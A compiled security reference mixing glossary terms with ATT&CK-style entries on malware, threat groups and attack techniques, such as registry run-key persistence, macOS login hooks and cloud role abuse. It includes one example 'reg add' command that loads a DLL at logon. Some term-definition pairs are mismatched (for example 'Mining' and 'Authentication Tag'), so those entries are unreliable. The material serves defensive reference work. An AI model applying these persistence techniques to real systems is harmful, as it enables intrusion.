Definition: This is a strong coverage criterion that is required by the US Federal Aviation Administration for Level A (catastrophic failure consequence) software; i.e., software whose failure could lead to loss of function necessary for safe operation. It requires that every condition in a decision in the program has taken on all possible outcomes at least once, and each condition has been shown to independently affect the decision outcome, and that each entry and exit point have been invoked at least once.

Term: Tag
Definition: An electronic device that communicates with RFID readers. A tag can function as a beacon or it can be used to convey information such as an identifier.

Term: Global Navigation Satellite System
Definition: GNSS collectively refers to the worldwide positioning, navigation, and timing (PNT) determination capability available from one or more satellite constellations. Each GNSS system employs a constellation of satellites that operate in conjunction with a network of ground stations. Receivers and system integrity monitoring are augmented as necessary to support the required position, navigation, and timing performance for the intended operation.

Term: Logical Backup
Definition: A copy of the directories and files of a logical volume.

Term: scheduled data transfer
Definition: A connection used to transfer data on a regular, recurring basis.

Term: authorize processing
Definition: Access privileges granted to a user, program, or process or the act of granting those privileges.

Name: Agent Tesla
Type: malware
Description: Agent Tesla is a spyware Trojan written for the .NET framework that has been observed since at least 2014.

Term: Maximum Tolerable Downtime
Definition: The amount of time mission/business process can be disrupted without causing significant harm to the organization’s mission.

Term: Capability, Trust Management
Definition: The willingness to take actions expecting beneficial outcomes, based on assertions by other parties.

Term: frequency accuracy
Definition: The degree of conformity of a measured or calculated frequency to its definition. Because accuracy is related to the offset from an ideal value, frequency accuracy is usually stated in terms of the frequency offset.

Term: Capability, Configuration Settings Management
Definition: An ISCM capability that identifies configuration settings (Common Configuration Enumerations [CCEs]) on devices that are likely to be used by attackers to compromise a device and use it as a platform from which to extend compromise to the network.

Term: MacOutputBits
Definition: The bit length of the MAC output block such that MacOutputBits = 8 ´ MacOutputLen.

Term: Asia-Pacific Network Information Centre
Definition: The Regional Internet Registry for the Asia Pacific region that allocates and registers Internet resources in its region.

Term: HVA
Definition: Information or an information system that is so critical to an organization that the loss or corruption of this information or loss of access to the system would have serious impacts on the organization’s ability to perform its mission or conduct business.

Term: Remote Access Server
Definition: Devices, such as virtual private network gateways and modem servers, that facilitate connections between networks.

Term: CSF Current Profile
Definition: A part of an Organizational Profile that specifies the Core outcomes that an organization is currently achieving (or attempting to achieve) and characterizes how or to what extent each outcome is being achieved.

Term: information security risk
Definition: The risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation due to the potential for unauthorized access, use, disclosure, disruption, modification, or destruction of information and/or information systems.

Term: <strong>Shall</strong>
Definition: Is required to. Requirements apply to conforming implementations.

Name: CozyCar
Type: malware
Description: CozyCar is malware that was used by APT29 from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality.

Term: control baseline
Definition: The set of security and privacy controls defined for a low-impact, moderate-impact, or high-impact system or selected based on the privacy selection criteria that provide a starting point for the tailoring process.

Name: Email Bombing
Type: attack-pattern
Description: Adversaries may flood targeted email addresses with an overwhelming volume of messages. This may bury legitimate emails in a flood of spam and disrupt business operations.

An adversary may accomplish email bombing by leveraging an automated bot to register a targeted address for e-mail lists that do not validate new signups, such as online newsletters. The result can be a wave of thousands of e-mails that effectively overloads the victim’s inbox.

By sending hundreds or thousands of e-mails in quick succession, adversaries may successfully divert attention away from and bury legitimate messages including security alerts, daily business processes like help desk tickets and client correspondence, or ongoing scams. This behavior can also be used as a tool of harassment.

This behavior may be a precursor for Spearphishing Voice. For example, an adversary may email bomb a target and then follow up with a phone call to fraudulently offer assistance. This social engineering may lead to the use of Remote Access Software to steal credentials, deploy ransomware, conduct Financial Theft, or engage in other malicious activity.

Term: Assurance of validity
Definition: Confidence that a public key or domain parameter is arithmetically correct.

Term: Stateful Inspection
Definition: Packet filtering that also tracks the state of connections and blocks packets that deviate from the expected state.

Name: Registry Run Keys / Startup Folder
Type: attack-pattern
Description: Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.

The following run keys are created by default on Windows systems:

* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

Run keys may exist under multiple hives. The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> 

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>.

The following Registry keys can be used to set startup folder items for persistence:

* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot:

* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run automatically for the currently logged-on user.

By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

Term: records
Definition: The recordings (automated and/or manual) of evidence of activities performed or results achieved (e.g., forms, reports, test results) that serve as a basis for verifying that the organization and the system are performing as intended. Also used to refer to units of related data fields (i.e., groups of data fields that can be accessed by a program and that contain a complete set of information on particular items).

Name: MOPSLED
Type: malware
Description: MOPSLED is a shellcode-based modular backdoor that has been used by China-nexus cyber espionage actors including UNC3886 and APT41.

Term: Event Aggregation
Definition: The consolidation of similar or related information.

Name: Kazuar
Type: malware
Description: Kazuar is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework.

Term: MLS
Definition: Concept of processing information with different classifications and categories that simultaneously permits access by users with different security clearances and denies access to users who lack authorization.

Term: accreditation
Definition: Formal declaration by a Designated Approving Authority that an Information System is approved to operate in a particular security mode using a prescribed set of safeguards at an acceptable level of risk.

Name: Transfer Data to Cloud Account
Type: attack-pattern
Description: Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.

A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.

Adversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.

Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.

Name: NTFS File Attributes
Type: attack-pattern
Description: Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). 

Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.

Term: ISC
Definition: A discrete, identifiable information technology asset (e.g., hardware, software, firmware) that represents a building block of an information system. Information system components include commercial information technology products.

Name: APT28 Nearest Neighbor Campaign
Type: campaign
Description: APT28 Nearest Neighbor Campaign was conducted by APT28 from early February 2022 to November 2024 against organizations and individuals with expertise on Ukraine. APT28 primarily leveraged living-off-the-land techniques, while leveraging the zero-day exploitation of CVE-2022-38028. Notably, APT28 leveraged Wi-Fi networks in close proximity to the intended target to gain initial access to the victim environment. By daisy-chaining multiple compromised organizations nearby the intended target, APT28 discovered dual-homed systems (with both a wired and wireless network connection) to enable Wi-Fi and use compromised credentials to connect to the victim network.

Term: Test Plan
Definition: A document that outlines the specific steps that will be performed for a particular test, including the required logistical items and expected outcome or response for each step.

Term: common platform enumeration (CPE)
Definition: A SCAP specification that provides a standard naming convention for operating systems, hardware, and applications for the purpose of providing consistent, easily parsed names that can be shared by multiple parties and solutions to refer to the same specific platform type.

Term: Mining
Definition: The data structure where the data is hashed and combined until there is a singular root hash that represents the entire structure.

Term: Configuration Settings Management
Definition: See Capability, Configuration Settings Management.

Term: secret key
Definition: A single cryptographic key that is used with a symmetric (secret key) cryptographic algorithm and is not made public (i.e., the key is kept secret). A secret key is also called a symmetric key.

Term: Fungible
Definition: Refers to something that is replaceable or interchangeable (i.e., not uniquely identifiable).

Term: key transport
Definition: A manual or automated key-establishment procedure whereby one entity (the sender) selects and distributes the key to another entity (the receiver).

Name: Sowbug
Type: intrusion-set
Description: Sowbug is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015.

Term: catalog
Definition: The collection of all assessment elements.

Term: Comparison
Definition: See also Identification.

Term: IETF
Definition: The Internet Engineering Task Force is the premier Internet standards body that develops open Internet standards.

Term: hypervisor
Definition: The virtualization component that manages the guest OSs on a host and controls the flow of instructions between the guest OSs and the physical hardware.

Term: operational concept
Definition: Verbal and graphic statement of an organization’s assumptions or intent in regard to an operation or series of operations of a specific system or a related set of specific new, existing, or modified systems.

Name: Software Deployment Tools
Type: attack-pattern
Description: Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager. 

Access to network-wide or enterprise-wide endpoint management software may enable an adversary to achieve remote code execution on all connected systems. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

SaaS-based configuration management services may allow for broad Cloud Administration Command on cloud-hosted instances, as well as the execution of arbitrary commands on on-premises endpoints. For example, Microsoft Configuration Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to Entra ID. Such services may also utilize Web Protocols to communicate back to adversary owned infrastructure.

Network infrastructure devices may also have configuration management tools that can be similarly abused by adversaries.

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to access specific functionality.

Term: hash output
Definition: See “message digest”.

Term: security assessment
Definition: The testing and/or evaluation of the management, operational, and technical security controls in a system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.

Term: SSH Client
Definition: The software implementation that enables a user or an automated process to remotely access an SSH server. An SSH client is responsible for reliably performing all of the operations necessary to ensure a secure connection, including generating identity keys, prompting users to verify host keys, authenticating and establishing encrypted connections with SSH servers, prompting users for credentials, performing public key authentication, etc.

Term: cookie
Definition: A small file that stores information for a Web site on a user’s computer.

Term: Trust Protection Platform
Definition: The Venafi Machine Identity Protection platform used in the example implementation described in this practice guide.

Term: Element Processes
Definition: A series of operations performed in the making or treatment of an element; performing operations on elements/data.

Term: attribute
Definition: A quality or characteristic ascribed to someone or something.

Name: Login Hook
Type: attack-pattern
Description: Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks. 

Adversaries can add or insert a path to a malicious script in the <code>com.apple.loginwindow.plist</code> file, using the <code>LoginHook</code> or <code>LogoutHook</code> key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.

**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of Launch Daemon and Launch Agent

Term: DRP
Definition: A written plan for processing critical applications in the event of a major hardware or software failure or destruction of facilities.

Name: Employee Names
Type: attack-pattern
Description: Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.

Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: Phishing or Valid Accounts).

Term: DEA
Definition: Data Encryption Algorithm, previously specified in FIPS 46 (now withdrawn).

Term: <em>Non-deterministic Random Bit Generator (NRBG)</em>
Definition: An RBG that always has access to an entropy source and (when working properly) produces output bitstrings that have full entropy. Often called a True Random Number (or Bit) Generator. (Contrast with a deterministic random bit generator).

Term: Near Field Communication (NFC)
Definition: A form of contactless, close proximity, radio communications based on radio-frequency identification (RFID) technology.

Name: Gather Victim Identity Information
Type: attack-pattern
Description: Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about users could also be enumerated via other active means (i.e. Active Scanning) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system or permitted MFA /methods associated with those usernames. Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites).

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Phishing for Information), establishing operational resources (ex: Compromise Accounts), and/or initial access (ex: Phishing or Valid Accounts).

Term: Information System User
Definition: Individual, or (system) process acting on behalf of an individual, authorized to access an information system.
See Organizational User and Non-Organizational User.

Term: SDoC
Definition: Declaration where the conformity assessment activity is performed by the person or organization that provides the ‘object’ (such as product, process, management system, person or body) and the supplier provides written confidence of conformity.

Term: iDEN
Definition: a proprietary mobile communications technology developed by Motorola that combine the capabilities of a digital cellular telephone with two-way radio.

Term: purpose specification and use limitation
Definition: A privacy principle (FIPP) that addresses an organization's notice to individuals regarding the specific purpose for which PII is collected and restricting an organization's use, processing, storage, maintenance, dissemination, or disclosure of PII for a purpose that is explained in the notice and is compatible with the purpose for which the PII was collected, or that is otherwise legally authorized.

Name: TA505
Type: intrusion-set
Description: TA505 is a cyber criminal group that has been active since at least 2014. TA505 is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving Clop.

Name: BADNEWS
Type: malware
Description: BADNEWS is malware that has been used by the actors responsible for the Patchwork campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control.

Term: IV
Definition: A nonce that is associated with an invocation of authenticated encryption on a particular plaintext and AAD.

Name: Pony
Type: malware
Description: Pony is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.

Term: application
Definition: A system for collecting, saving, processing, and presenting data by means of a computer. The term application is generally used when referring to a component of software that can be executed. The terms application and software application are often used synonymously.

Term: public key cryptography (PKC)
Definition: A form of cryptography that uses two related keys, a public key and a private key; the two keys have the property that, given the public key, it is computationally infeasible to derive the private key. 
For key establishment, public-key cryptography allows different parties to communicate securely without having prior access to a secret key that is shared, by using one or more pairs (public key and private key) of cryptographic keys.

Term: navigation
Definition: The ability to determine a current and desired position (relative or absolute) and apply corrections to course, orientation, and speed to attain a desired position. Navigation coverage requirements could be global, from sub-surface to surface and from surface to space.

Term: consumer-grade router product
Definition: Consumer-grade router device and any additional product components (e.g., backend, smartphone application) that are necessary to use the consumer-grade router device beyond basic operational features.

Term: Internet Message Access Protocol (IMAP)
Definition: A mailbox access protocol defined by IETF RFC 3501. IMAP is one of the most commonly used mailbox access protocols. IMAP offers a much wider command set than POP.

Term: Key agreement primitive
Definition: A DLC primitive specified in [SP 800-56A] or an RSA Secret Value Encapsulation (RSASVE) operation specified in [NIST SP 800-56B].

Term: Public Reviewer
Definition: Member of the general public who reviews a candidate checklist and sends comments to NIST.

Name: NanoCore
Type: malware
Description: NanoCore is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.

Term: cryptographic binding
Definition: Associating two or more related elements of information using cryptographic techniques.

Term: Key-transport transaction
Definition: A key-establishment event which results in secret keying material that is shared between the parties using a key-transport scheme.

Term: privacy architect
Definition: Individual, group, or organization responsible for ensuring that the system privacy requirements necessary to protect individuals’ privacy are adequately addressed in all aspects of enterprise architecture including reference models, segment and solution architectures, and information systems processing PII.

Term: MAC
Definition: A cryptographic checksum on data that uses a symmetric key to detect both accidental and intentional modifications of the data.

Name: Scanning IP Blocks
Type: attack-pattern
Description: Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.

Adversaries may scan IP blocks in order to Gather Victim Network Information, such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts. Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services).

Term: continuity of operations plan (COOP)
Definition: A predetermined set of instructions or procedures that describe how an organization’s mission essential functions will be sustained within 12 hours and for up to 30 days as a result of a disaster event before returning to normal operations.

Term: Authentication code
Definition: A cryptographic checksum based on an approved security function (also known as a Message Authentication Code).

Term: Archive facility
Definition: 1. To place information into long-term storage. 2. A locat ion or media ussed for long-term storage.

Term: authorize processing
Definition: The process of verifying that a requested action or service is approved for a specific entity.

Term: Upgrade Management System
Definition: The hardware and software used to communicate and manage the Upgrade Process. The Upgrade Management System may be included in the Network Management System.

Term: key management
Definition: The activities involving the handling of cryptographic keys and other related security parameters (e.g. passwords) during the entire life cycle of the keys, including their generation, storage, establishment, entry and output, and destruction.

Name: DOWNIISSA
Type: malware
Description: DOWNIISSA is a shellcode downloader that has been used by MirrorFace since at least 2022 to deploy payloads, including the LODEINFO backdoor.

Name: NightClub
Type: malware
Description: NightClub is a modular implant written in C++ that has been used by MoustachedBouncer since at least 2014.

Term: ciphertext
Definition: Data in its enciphered form.

Term: anonymization
Definition: process that removes the association between the identifying dataset and the data subject

Name: PHASEJAM
Type: malware
Description: PHASEJAM is a dropper written as a bash shell script that modifies Ivanti Connect Secure appliance components. PHASEJAM was first reported in January 2025. PHASEJAM has previously been leveraged by People's Republic of China (PRC)- affiliated actors identified as UNC5221 and SYLVANITE.

Term: system component
Definition: See information system component.

Name: Medusa Group
Type: intrusion-set
Description: Medusa Group has been active since at least 2021 and was initially operated as a closed ransomware group before evolving into a Ransomware-as-a-Service (RaaS) operation. Some reporting indicates that certain attacks may still be conducted directly by the ransomware’s core developers. Public sources have also referred to the group as “Spearwing” or “Medusa Actors.” Medusa Group employs living-off-the-land techniques, frequently leveraging publicly available tools and common remote management software to conduct operations. The group engages in double extortion tactics, exfiltrating data prior to encryption and threatening to publish stolen information if ransom demands are not met. For initial access, Medusa Group has exploited publicly known vulnerabilities, conducted phishing campaigns, and used credentials or access purchased from Initial Access Brokers (IABs). The group is opportunistic and has targeted a wide range of sectors globally.

Term: Authentication Tag
Definition: An electronic device that communicates with RFID readers. A tag can function as a beacon or it can be used to convey information such as an identifier.

Name: Additional Cloud Roles
Type: attack-pattern
Description: An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments. With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).
 

This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.

For example, in AWS environments, an adversary with appropriate permissions may be able to use the <code>CreatePolicyVersion</code> API to define a new version of an IAM policy or the <code>AttachUserPolicy</code> API to attach an IAM policy with additional or distinct permissions to a compromised user account.

In some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to Create Account or modify a victim-owned account.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service; the potential for a threat source to successfully exploit a particular information system vulnerability.

Term: patching
Definition: The act of applying a change to installed software – such as firmware, operating systems, or applications – that corrects security or functionality problems or adds new capabilities.

Term: FCB
Definition: A group of cooperating entities that collectively provide high-level vulnerability disclosure coordination among government agencies; the FCB represents the primary mechanism by which vulnerabilities should be reported to the Government and for the Government to produce advisories about government vulnerabilities.

Term: information system-related security risks
Definition: Risk that arises through the loss of confidentiality, integrity, or availability of information or information systems considering impacts to organizational operations and assets, individuals, other organizations, and the Nation. A subset of information security risk. See risk.

Term: MSL
Definition: Capability of an information system that is trusted to contain, and maintain separation between, resources (particularly stored data) of different security domains.

Term: Capability, Manage and Assess Risk
Definition: The program and supporting processes to manage information security risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation and includes (i) establishing the context for risk-related activities, (ii) assessing risk, (iii) responding to risk once determined, and (iv) monitoring risk over time.

Term: Block Cipher-based Message Authentication Code
Definition: Cipher-based Message Authentication Code (as specified in NIST SP 800-38B).

Term: concept of operations
Definition: See security concept of operations.

Term: mutual authentication
Definition: The process of both entities involved in a transaction verifying each other. See bidirectional authentication.

Term: security incident
Definition: An occurrence that actually or imminently jeopardizes, without lawful authority, the integrity, confidentiality, or availability of information or an information system; or constitutes a violation or imminent threat of violation of law, security policies, security procedures, or acceptable use policies.

Term: insider threat
Definition: The threat that an insider will use their authorized access, wittingly or unwittingly, to do harm to the security of the United States. This threat can include damage to the United States through espionage, terrorism, unauthorized disclosure, or through the loss or degradation of departmental resources or capabilities.

Term: exfiltration
Definition: The unauthorized transfer of information from an information system.

Term: Post-Market Capability
Definition: A cybersecurity or privacy capability an organization selects, acquires, and deploys itself; any capability that is not pre-market.

Term: party
Definition: Organization entering into an agreement.

Term: Mobile Internet Key Exchange (MOBIKE)
Definition: A form of IKE supporting the use of devices with multiple network interfaces that switch from one network to another while IPsec is in use.

Term: USIM
Definition: A module similar to the SIM in GSM/GPRS networks, but with additional capabilities suited to 3G networks.

Term: system component
Definition: Smallest selectable set of elements on which requirements may be based.

Term: <em>X2(obs)</em>
Definition: The chi-square statistic computed on the observed values. See Sections 2.2, 2.4, 2.5, 2.7, 2.8, 2.10, 2.12, 2.14, and the corresponding sections of Section 3.

Term: party
Definition: An individual (person), organization, device or process.

Name: Privileged Account Management
Type: course-of-action
Description: Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.This mitigation can be implemented through the following measures:

Account Permissions and Roles:

- Implement RBAC and least privilege principles to allocate permissions securely.
- Use tools like Active Directory Group Policies to enforce access restrictions.

Credential Security:

- Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
- Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).

Multi-Factor Authentication (MFA):

- Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.

Privileged Access Management (PAM):

- Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.

Auditing and Monitoring:

- Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.

Just-In-Time Access:

- Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.

*Tools for Implementation*

Privileged Access Management (PAM):

- CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.

Credential Management:

- Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.

Multi-Factor Authentication:

- Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.

Linux Privilege Management:

- sudo configuration, SELinux, AppArmor.

Just-In-Time Access:

- Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.

Term: Secure Sockets Layer (SSL)
Definition: An authentication and security protocol widely implemented in browsers and web servers. TLS is defined by RFC 5246 and RFC 8446.

Term: common weakness enumeration (CWE)
Definition: A list of known poor coding practices that may be present in software [CWE].

Term: attribute
Definition: A claim of a named quality or characteristic inherent in or ascribed to someone or something. (See term in [ICAM] for more information.)

Term: KMPS
Definition: A document or set of documentation that describes in detail the organizational structure, responsible roles, and organization rules for the functions identified in the Key Management Policy.

Term: CDS
Definition: A form of controlled interface that provides the ability to manually and/or automatically access and transfer information between different security domains. A CDS may consist of one or more devices.

Term: ID
Definition: Develop and implement the appropriate activities to identify the occurrence of a cybersecurity event.

Term: Update Server
Definition: A server that provides patches and other software updates to Internet of Things devices.

Term: ID
Definition: The process of discovering the identity (i.e., origin or initial history) of a person or item from the entire collection of similar persons or items.

Term: encrypted key
Definition: A cryptographic key that has been encrypted using an approved security function with a key-encrypting key in order to disguise the value of the underlying plaintext key.

Term: NDAC
Definition: See mandatory access control (MAC).

Term: FTP
Definition: A standard for transferring files over the internet. FTP programs and utilities are used to upload and download web pages, graphics, and other files between local media and a remote server that allows FTP access.

Term: ID
Definition: A bit string that is associated with a person, device, or organization. It may be an identifying name or may be something more abstract (e.g., a string consisting of an IP address and timestamp), depending on the application.

Name: Cloud Infrastructure Discovery
Type: attack-pattern
Description: An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.

Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket. Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project , and Azure's CLI command <code>az vm list</code> lists details of virtual machines. In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through Wordlist Scanning.

An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user. The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in Cloud Service Discovery, this technique focuses on the discovery of components of the provided services rather than the services themselves.

Term: Awareness
Definition: Awareness is not training. The purpose of awareness presentations is simply to focus attention on security. Awareness presentations are intended to allow individuals to recognize IT security concerns and respond accordingly.

In awareness activities, the learner is the recipient of information, whereas the learner in a training environment has a more active role. Awareness relies on reaching broad audiences with attractive packaging techniques. Training is more formal, having a goal of building knowledge and skills to facilitate the job performance.

Term: indirect identifier
Definition: information that can be used to identify an individual through association with other information

Term: IFC
Definition: Integer Factorization Cryptography.

Term: positive control (security)
Definition: Active form of security monitoring where an unexpected result generates an alarm. Note: The unexpected result generates an alarm because a positive control test was executed against a registered data set in which the correct result is very well-known, but the expected result was not returned or observed.

Name: BOOTRASH
Type: malware
Description: BOOTRASH is a Bootkit that targets Windows operating systems. It has been used by threat actors that target the financial sector.

Name: Attor
Type: malware
Description: Attor is a Windows-based espionage platform that has been seen in use since 2013. Attor has a loadable plugin architecture to customize functionality for specific targets.

Term: Hotfix
Definition: Updated code from Microsoft that addresses a specific security problem.

Term: Logical Test
Definition: An expression comprised of logical operators and one or more expressions to be evaluated. The individual expressions within a logical test may be fact references, check fact references, and/or other logical tests.

Term: digital signature
